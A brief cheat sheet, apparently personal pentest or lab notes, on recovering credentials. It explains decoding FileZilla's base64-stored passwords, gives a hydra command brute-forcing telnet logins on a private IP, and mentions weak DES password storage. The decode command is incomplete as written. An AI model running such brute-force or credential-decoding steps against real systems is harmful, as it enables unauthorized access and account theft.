Filezilla encode stored password with base64, so decode them with:
echo |base64 --decode
Telnet brute force:
hydra -t 63 -V -f -x 6:6:1 -vV 10.13.64.99 telnet -l '' -w 2
Password are stored with DES encryption ... which has been cracked a while ago.
